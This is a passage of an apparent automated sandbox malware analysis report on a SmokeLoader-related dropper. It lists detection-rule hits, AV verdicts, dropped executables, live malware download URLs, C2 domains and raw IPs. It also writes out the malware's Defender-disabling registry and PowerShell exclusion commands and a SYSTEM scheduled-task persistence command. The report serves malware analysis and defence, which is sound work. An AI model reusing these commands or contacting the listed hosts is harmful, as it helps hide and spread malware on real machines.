/c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /odidum "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe, ParentProcessId: 8020, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, ProcessId: 8276, ProcessName: schtasks.exe
                  Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /odidum "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe, ParentProcessId: 8020, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F, ProcessId: 8276, ProcessName: schtasks.exe
                  Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe, ProcessId: 7984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lgX7lgUL1w.exe", ParentImage: C:\Users\user\Desktop\lgX7lgUL1w.exe, ParentProcessId: 968, ParentProcessName: lgX7lgUL1w.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 5760, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7336, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 3960, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://45.129.96.86:80/file/update.exeAvira URL Cloud: Label: malware
                  Source: https://f.123654987.xyz/525403/setup.exe_Avira URL Cloud: Label: malware
                  Source: https://f.123654987.xyz/525403/setup.exevAvira URL Cloud: Label: malware
                  Source: http://66.85.156.89/nafdhkdf.exeAvira URL Cloud: Label: malware
                  Source: https://monoblocked.com/525403/setup.exeAvira URL Cloud: Label: malware
                  Source: https://lop.foxesjoy.com:80/ssl/crt.exeBtAvira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exeAvira: detection malicious, Label: HEUR/AGEN.1311176
                  Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exeAvira: detection malicious, Label: HEUR/AGEN.1311176
                  Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exeAvira: detection malicious, Label: HEUR/AGEN.1314708
                  Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exeAvira: detection malicious, Label: HEUR/AGEN.1314708
                  Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exeAvira: detection malicious, Label: HEUR/AGEN.1314708
                  Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exeAvira: detection malicious, Label: HEUR/AGEN.1314708
                  Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                  Source: https://yip.su/redirect-Virustotal: Detection: 7%Perma Link
                  Source: http://5.42.66.10/download/th/retail.phphpVirustotal: Detection: 6%Perma Link
                  Source: http://45.129.96.86:80/file/update.exeVirustotal: Detection: 20%Perma Link
                  Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exeReversingLabs: Detection: 45%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeReversingLabs: Detection: 75%
                  Source: C:\Users\user\AppData\Local\Temp\ED0F.exeReversingLabs: Detection: 95%
                  Source: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exeReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exeReversingLabs: Detection: 52%
                  Source: lgX7lgUL1w.exeVirustotal: Detection: 20%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.7% probability
                  Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: Yara matchFile source: lgX7lgUL1w.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1201842177.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lgX7lgUL1w.exe PID: 968, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: lgX7lgUL1w.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp

                  Change of critical system settings

                  barindex
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe

                  Spreading

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_0040553A FindFirstFileA,18_2_0040553A
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,18_2_004055DE
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 66.85.156.89 80
                  Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                  Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                  Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: WaSFZllUCVoGMQbapl7iiNhG.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: kIqVtyaJ3Md4voRq7FbxRbNc.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: BuFPDwZaV1iS9PXkCB7kSU2D.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: VwW7Zrgqb8W4pCzz9zGBtVYi.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: QlycVMt9XxnRzBMLYO9bD2Xg.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: fb815uICkCyOkfRy3eesDn62.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: F4U52lR6G7O1cHxteAioycWo.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 1QmyjDm1eFH0lgBrYiowPc38.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: cIoVbmWEriSiViaXsDVPRBww.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: w4xiNBVLdPuuQzpgLYTzx18Y.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 2Ik0JEK56ZEfeWSnlWXlxAQH.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: SemaoG1Uwehw633tFAn5ubO2.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: qDDOYpn1QugD92FNbGgaxms8.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: YX45oTvqMEPC5GJFPgqFMHJF.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: RzyrdRTROyDyffduQ1CbhttT.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: S0yywC6t6qDFXXOiN4mRrQOm.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 8PAbeHuClLlqK8bLhAM9cs8l.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: fqTri05otLw3AgCCHnmdVecS.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: YV2wsGyAOAc9vN2gHfk2THwt.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: Wh0WdTK7FmemcqdqznsDUek0.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: OEf7asb27AljF1U8YK72cN6l.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 8x9fHtTH22TaURiMTLqQ6qDQ.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: JjDJbN3mgLfy7jfCjajQylmg.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 7XiHagxRttiQJ0jD8B1KcnGB.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: BoufAyOi6g3dz7fgFn5cKMkk.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: tFMRJ2N4WXQX8R9XoXwDeTd7.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: ECaYsN3ZlPVQpORLp9yKqP3b.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: GEiB3Ddcoc4kuTiV3LIO2ABQ.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: acQeHpiFDRznT8wjZFcvB4qB.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: WAQu9tLKGblXXebB2miyLMLA.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: ZkgAUWW1XaYJAcqvB0QszT7a.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: QdAnaM3mjG9zwvm6YlndB8Yg.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: twwmm95SEd1qhyzlGrhpRq1C.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: yn8qA7eUPrrxMa2hPKWNWLT4.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: TUdvQ3wmTDhA7WvLZJFgTEvp.exe.5.dr
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: e3VBEHEyvWHF7UQhQQ1Xwuc5.exe.19.dr
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: AaWaOfvGFn1i9dXWYSo7dRjD.exe.19.dr
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: 49PhL2u6RJaN6gkfIG6mTjtg.exe.19.dr
                  Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.233c776f568.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewIP Address: 85.192.56.26 85.192.56.26
                  Source: Joe Sandbox ViewIP Address: 85.192.56.26 85.192.56.26
                  Source: Joe Sandbox ViewIP Address: 87.240.132.78 87.240.132.78
                  Source: Joe Sandbox ViewIP Address: 87.240.132.78 87.240.132.78
                  Source: Joe Sandbox ViewIP Address: 104.192.108.17 104.192.108.17
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exeString found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com h equals www.facebook.com (Facebook)
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exeString found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com h equals www.youtube.com (Youtube)
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.facebook.com (Facebook)
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.twitter.com (Twitter)
